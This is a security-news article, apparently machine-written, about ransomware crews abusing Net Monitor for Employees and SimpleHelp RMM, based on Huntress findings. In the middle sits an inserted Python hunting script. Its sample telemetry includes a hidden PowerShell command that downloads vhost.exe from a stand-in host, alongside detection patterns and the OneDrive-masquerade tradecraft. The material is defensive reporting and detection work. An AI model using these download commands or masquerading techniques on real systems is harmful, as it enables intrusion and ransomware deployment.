Ethical Hacking News

Ransomware Crews' Latest Tool: Repurposed Employee Monitoring Software


Threat actors are using legitimate employee monitoring tools to gain access to corporate networks and deploy ransomware payloads, highlighting the importance of proactive cybersecurity measures to protect against these evolving threats. By leveraging software used for monitoring employees' activities, attackers can easily hide within enterprise IT environments and go unnoticed until it's too late. This incident serves as a stark reminder that vigilance is key in preventing such devastating cyber attacks.

  • Ransomware attackers are using legitimate employee monitoring software to gain access to corporate networks.
  • The attackers use software like Net Monitor for Employees Professional and SimpleHelp RMM to deploy malicious payloads.
  • It's challenging for security teams to distinguish between benign and malicious activity due to the blending of these tools with legitimate signed binaries.
  • Attackers used the same software companies use to monitor employee activity against them, making it harder to detect attacks.
  • Companies should turn on multi-factor authentication, limit remote access, and conduct regular audits of third-party RMM tools to prevent such incidents.



In a shocking turn of events, cybersecurity experts have discovered that ransomware crews are leveraging legitimate employee monitoring software to gain access to corporate networks and deploy malicious payloads. The Huntress response team has identified two recent cases where attackers used the Net Monitor for Employees Professional tool in tandem with the SimpleHelp RMM (remote monitoring and management) software to launch a devastating cyber attack on unsuspecting victims.

According to Michael Tigges, senior security operations analyst at Huntress, "RMMs and employee monitoring tools blend in amongst legitimate signed binaries," making it challenging for security teams to distinguish between benign and malicious activity. This phenomenon is particularly concerning, as attackers can utilize the same software that companies use to monitor employee activity against them.

The first incident observed by Huntress took place in late January, where an attacker managed to install Net Monitor for Employees Professional on a victim's machine without any observed initial access. The intruder then manipulated user accounts via multiple net commands, including attempting to identify valid usernames, reset passwords, and create new admin-user accounts on the host.

The attackers used PowerShell to pull down a file named vhost.exe from the IP address 160.191.182[.]41, which turned out to be the SimpleHelp executable. The intruder then attempted to deploy multiple versions of Crazy ransomware linked to VoidCrypt, but ultimately failed to deploy the malware.

The second incident, which occurred in early February, involved a compromised third-party SSL VPN account that provided the attacker with initial access to the victim's computer. They connected to a domain controller using remote desktop protocol and launched a PowerShell session before installing the Net Monitor agent and configuring it to call back to an attacker-controlled console.

The attackers cleverly disguised the agent as Microsoft OneDrive by registering the service as OneDriveSvc, naming the process OneDriver.exe, and renaming the running binary to svchost.exe. They then used SimpleHelp to monitor for keywords related to cryptocurrency wallets, exchanges, blockchain explorers, and payment platforms, indicating a financial motivation that extends beyond ransomware.

The use of shared infrastructure in both cases, as well as overlapping IP addresses and reused filenames (vhost.exe), "strongly suggests" a single attacker or group behind the two intrusions. Huntress warns that organizations should turn on multi-factor authentication on all remote access services and external-facing applications and limit remote access to only those users and systems that require it to do their jobs.

Conducting regular audits of third-party RMM tools and employee monitoring software is also recommended by the security analysts, as well as monitoring for any unusual process execution chains. This highlights the importance of vigilance in the face of ever-evolving cyber threats and underscores the need for proactive cybersecurity measures to protect against such attacks.
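To make the audit and process-chain monitoring advice concrete, the following is an added example (not Huntress's tooling or any code from the article) that runs a handful of hunting rules over constructed endpoint telemetry. The sample events mirror the tradecraft described above: a service registered as OneDriveSvc backed by a binary outside Microsoft's install directories, a renamed binary running as svchost.exe from a user-writable path, PowerShell pulling down vhost.exe, and an RMM binary executing from a location that is not on the organization's approved list. The event field names, the `HelpDeskRMM` product, its approved directory, and the 203.0.113.10 address are all assumptions for the example.

```python
"""Hunting for repurposed RMM and employee-monitoring tooling in endpoint telemetry.

Added example, not Huntress's code. SAMPLE_EVENTS are constructed records that
mirror the tradecraft described in the article; field names and log shape are
assumed, not any vendor's schema.
"""
import re
from typing import Dict, Iterable, List, Tuple

# Where genuine Windows and Microsoft OneDrive binaries normally execute from.
TRUSTED_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\microsoft onedrive\\",
    "c:\\program files (x86)\\microsoft onedrive\\",
)
# Per-user OneDrive installs live under %LOCALAPPDATA%; match any username.
USER_ONEDRIVE_RE = re.compile(r"^c:\\users\\[^\\]+\\appdata\\local\\microsoft\\onedrive\\")
# Locations a standard user can write to; services rarely run legitimately from here.
USER_WRITABLE_DIRS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Path substrings for the tools named in the article (vhost.exe was the renamed
# SimpleHelp binary; "netmonitor" is an assumed marker) plus a hypothetical
# approved help-desk RMM.
KNOWN_RMM_MARKERS = ("simplehelp", "vhost.exe", "netmonitor", "helpdeskrmm")
# Directory where the organization's sanctioned RMM is allowed to run (assumed).
APPROVED_RMM_DIRS = ("c:\\program files\\helpdeskrmm\\",)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)

# Constructed sample telemetry: ids 1, 4 and 6 are benign controls.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "event_type": "service_install", "service_name": "OneDrive Updater Service",
     "image": "C:\\Program Files\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe"},
    {"id": 2, "event_type": "service_install", "service_name": "OneDriveSvc",
     "image": "C:\\ProgramData\\OneDrive\\OneDriver.exe"},
    {"id": 3, "event_type": "process_create", "image": "C:\\Users\\Public\\svchost.exe",
     "parent_image": "C:\\Windows\\System32\\services.exe", "command_line": "svchost.exe", "user": "CORP\\jdoe"},
    {"id": 4, "event_type": "process_create", "image": "C:\\Windows\\System32\\svchost.exe",
     "parent_image": "C:\\Windows\\System32\\services.exe", "command_line": "svchost.exe -k netsvcs",
     "user": "NT AUTHORITY\\SYSTEM"},
    {"id": 5, "event_type": "process_create",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe", "user": "CORP\\jdoe",
     "command_line": "powershell -nop -w hidden (New-Object Net.WebClient).DownloadFile("
                     "'http://203.0.113.10/vhost.exe','C:\\Users\\Public\\vhost.exe')"},
    {"id": 6, "event_type": "process_create", "image": "C:\\Program Files\\HelpDeskRMM\\agent.exe",
     "parent_image": "C:\\Windows\\System32\\services.exe", "command_line": "agent.exe", "user": "NT AUTHORITY\\SYSTEM"},
    {"id": 7, "event_type": "process_create", "image": "C:\\Users\\Public\\vhost.exe",
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "vhost.exe", "user": "CORP\\jdoe"},
]


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def _in_trusted_dir(image: str) -> bool:
    p = image.lower()
    return p.startswith(TRUSTED_DIRS) or bool(USER_ONEDRIVE_RE.match(p))


def evaluate_events(events: Iterable[Dict], approved_rmm_dirs: Tuple[str, ...] = APPROVED_RMM_DIRS) -> List[Dict]:
    """Return one alert dict per rule that fires on an event; benign events yield none."""
    alerts: List[Dict] = []

    def add(ev: Dict, rule: str, detail: str) -> None:
        alerts.append({"event_id": ev["id"], "rule": rule, "detail": detail})

    for ev in events:
        image = ev["image"].lower()
        name = _basename(image)
        if ev["event_type"] == "service_install":
            # A service borrowing the OneDrive name but not installed where OneDrive lives.
            if "onedrive" in ev["service_name"].lower() and not _in_trusted_dir(image):
                add(ev, "service_masquerade", f"{ev['service_name']} -> {ev['image']}")
        elif ev["event_type"] == "process_create":
            cmd = ev.get("command_line", "")
            parent = _basename(ev.get("parent_image", ""))
            # svchost.exe only ever runs from System32/SysWOW64.
            if name == "svchost.exe" and not image.startswith(TRUSTED_DIRS[:2]):
                add(ev, "svchost_outside_system32", ev["image"])
            # PowerShell fetching content from a URL.
            if name in ("powershell.exe", "pwsh.exe") and DOWNLOAD_RE.search(cmd):
                m = URL_RE.search(cmd)
                add(ev, "powershell_download", m.group(0) if m else cmd)
            # Known RMM binary running outside the sanctioned install directory.
            if any(mk in image for mk in KNOWN_RMM_MARKERS) and not image.startswith(approved_rmm_dirs):
                add(ev, "unapproved_rmm", ev["image"])
            # Script host spawning an executable from a user-writable location.
            if parent in SCRIPT_HOSTS and image.startswith(USER_WRITABLE_DIRS):
                add(ev, "scripted_parent_chain", f"{parent} -> {ev['image']}")
    return alerts


def summarize(alerts: Iterable[Dict]) -> Dict[str, List[int]]:
    """Group fired event ids by rule name, sorted, for a quick triage view."""
    out: Dict[str, List[int]] = {}
    for a in alerts:
        out.setdefault(a["rule"], []).append(a["event_id"])
    return {rule: sorted(ids) for rule, ids in out.items()}


if __name__ == "__main__":
    for a in evaluate_events(SAMPLE_EVENTS):
        print(f"event {a['event_id']:>2}  {a['rule']:<24} {a['detail']}")
```

The rules are deliberately narrow so that the benign controls (a genuine OneDrive updater, the real svchost.exe, the sanctioned RMM from its approved path) stay silent while each piece of the described tradecraft trips at least one rule; in production the approved-RMM directory list is the artefact the periodic audit maintains, and the service and parent-chain rules are the ones worth wiring to an alert rather than a report.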

In conclusion, this recent revelation underscores the cunning nature of ransomware crews who are continually seeking new methods to infiltrate corporate networks. By leveraging legitimate employee monitoring software, they have managed to blend into these environments undetected until now. It is crucial that companies take immediate action to review and update their cybersecurity protocols to prevent such incidents in the future.



Related Information:
  • https://www.ethicalhackingnews.com/articles/Ransomware-Crews-Latest-Tool-Repurposed-Employee-Monitoring-Software-ehn.shtml

  • Published: Tue Feb 17 23:46:52 2026 by llama3.2 3B Q4_K_M

© Ethical Hacking News. All rights reserved.